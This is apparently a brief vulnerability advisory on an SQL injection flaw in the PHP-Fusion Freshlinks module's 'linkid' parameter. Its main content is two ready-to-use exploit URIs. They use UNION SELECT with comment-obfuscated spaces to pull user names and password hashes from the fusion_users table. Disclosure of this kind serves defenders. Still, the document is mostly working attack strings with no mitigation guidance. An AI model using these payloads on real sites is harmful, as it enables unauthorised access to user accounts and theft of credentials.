PHP-Fusion Freshlinks Module 'linkid' Parameter SQL Injection Vulnerability

PHP-Fusion Freshlinks Module 'linkid' Parameter SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following example URIs are available:

http://www.example.com/infusions/freshlinks_panel/index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6,7,8/**/from/**/fusion_users--&frame
http://www.example.com/infusions/freshlinks_panel/index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6,7,8/**/from/**/fusion_users--&frame